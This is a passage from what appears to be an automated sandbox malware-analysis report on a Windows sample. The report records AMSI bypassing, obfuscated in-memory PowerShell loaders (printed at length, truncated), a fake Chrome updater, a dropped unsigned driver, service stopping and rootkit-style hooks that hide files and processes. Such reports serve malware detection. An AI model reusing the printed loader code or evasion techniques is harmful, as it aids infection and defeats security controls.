          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
          Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
          Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: egFMhHSlmf.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: egFMhHSlmf.exeStatic file information: File size 5536856 > 1048576
          Source: egFMhHSlmf.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x528e00
          Source: egFMhHSlmf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000025.00000003.2206694268.0000017ADE760000.00000004.00000001.00020000.00000000.sdmp
          Source: egFMhHSlmf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: egFMhHSlmf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: egFMhHSlmf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: egFMhHSlmf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: egFMhHSlmf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation

          barindex
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($pGTzdTbPDPtdSw,$PKjZFAJMrKtEHtCAQET).Invoke(''+[Char](97)+'m'+'s'+''+'i'+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$RRZbMqrVsxPNJwFWd=$AzPrwzsUpDJMwf.Invoke($Null,@([Obj
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+'l'+'er'+
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($rnQeYQPaljIZIy,$BKEqIqCwRefEvWHkEvb).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$VaoZSrEKYRrKpAGDt=$JRxrSkXtFvo
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'TW'+[Char](65)+'R'+[Char](69)+'').GetValue(''+'d'+'i'+[Char](97)+'l'+[Char](101)+''+[Char](114)+
          Obfuscated command line found
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DHHElPDheRwtsc,[Parameter(Position=1)][Type]$RGuqRFFAmI)$xKbDjiiiAOv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'ss'+[Char](44)+'Pu'+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$xKbDjiiiAOv.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DHHElPDheRwtsc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'Man'+'a'+'g'+[Char](101)+''+[Char](100)+'');$xKbDjiiiAOv.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g'+','+'N'+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RGuqRFFAmI,$DHHElPDheRwtsc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $xKbDjiiiAOv.CreateType();}$HPsmfKkDEZPEO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$AzPrwzsUpDJMw
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tvJmJWkkljdL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rUCvlIraVSkSNU,[Parameter(Position=1)][Type]$lDxjOqsFCa)$hzEPfdAIUJU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Mem'+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$hzEPfdAIUJU.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$rUCvlIraVSkSNU).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'aged');$hzEPfdAIUJU.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](72)+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t,V'+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+'',$lDxjOqsFCa,$rUCvlIraVSkSNU).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $hzEPfdAIUJU.CreateType();}$opuJgspdjbNOB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+'a'+'f'+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'et'+[Char](104)+''+[Char](111)+''+[Char](1
          Suspicious powershell command line found
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DHHElPDheRwtsc,[Parameter(Position=1)][Type]$RGuqRFFAmI)$xKbDjiiiAOv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'ss'+[Char](44)+'Pu'+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$xKbDjiiiAOv.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DHHElPDheRwtsc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'Man'+'a'+'g'+[Char](101)+''+[Char](100)+'');$xKbDjiiiAOv.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g'+','+'N'+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RGuqRFFAmI,$DHHElPDheRwtsc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $xKbDjiiiAOv.CreateType();}$HPsmfKkDEZPEO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$AzPrwzsUpDJMw
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tvJmJWkkljdL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rUCvlIraVSkSNU,[Parameter(Position=1)][Type]$lDxjOqsFCa)$hzEPfdAIUJU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Mem'+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$hzEPfdAIUJU.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$rUCvlIraVSkSNU).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'aged');$hzEPfdAIUJU.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](72)+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t,V'+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+'',$lDxjOqsFCa,$rUCvlIraVSkSNU).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $hzEPfdAIUJU.CreateType();}$opuJgspdjbNOB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+'a'+'f'+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'et'+[Char](104)+''+[Char](111)+''+[Char](1
          Source: C:\Windows\System32\dialer.exeCode function: 66_2_0000000140832D30 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,66_2_0000000140832D30
          Source: egFMhHSlmf.exeStatic PE information: section name: .00cfg
          Source: updater.exe.0.drStatic PE information: section name: .00cfg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467646D push ebx; retf 0009h29_2_00007FFD3467657A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD346764FB push ebx; retf 0009h29_2_00007FFD3467657A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD346719DA pushad ; ret 29_2_00007FFD346719E9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467B05C push esp; retf 29_2_00007FFD3467B05D
          Source: C:\Windows\System32\conhost.exeCode function: 32_3_000001D29E8AB0ED push rcx; retf 003Fh32_3_000001D29E8AB0EE
          Source: C:\Windows\System32\winlogon.exeCode function: 50_3_000002D01659B0ED push rcx; retf 003Fh50_3_000002D01659B0EE
          Source: C:\Windows\System32\lsass.exeCode function: 64_3_000002D6F14FB0ED push rcx; retf 003Fh64_3_000002D6F14FB0EE
          Source: C:\Windows\System32\dialer.exeCode function: 65_2_0000000140001394 push qword ptr [0000000140009004h]; ret 65_2_0000000140001403
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD346963B1 push ebx; retf 0009h67_2_00007FFD346963FA
          Source: C:\Windows\System32\conhost.exeCode function: 68_3_00000146F6AEB0ED push rcx; retf 003Fh68_3_00000146F6AEB0EE
          Source: C:\Windows\System32\svchost.exeCode function: 69_3_0000014E41FBB0ED push rcx; retf 003Fh69_3_0000014E41FBB0EE
          Source: C:\Windows\System32\dwm.exeCode function: 70_3_000001D15B06B0ED push rcx; retf 003Fh70_3_000001D15B06B0EE

          Persistence and Installation Behavior

          barindex
          Sample is not signed and drops a device driver
          Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\xptjtnajcbas.sysJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
          Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\xptjtnajcbas.sysJump to dropped file
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
          Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\xptjtnajcbas.sysJump to dropped file
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          barindex
          Hooks files or directories query functions (used to hide files and directories)
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
          Hooks processes query functions (used to hide processes)
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
          Hooks registry keys query functions (used to hide registry keys)
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
          Source: C:\Windows\System32\dialer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE dialerstagerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
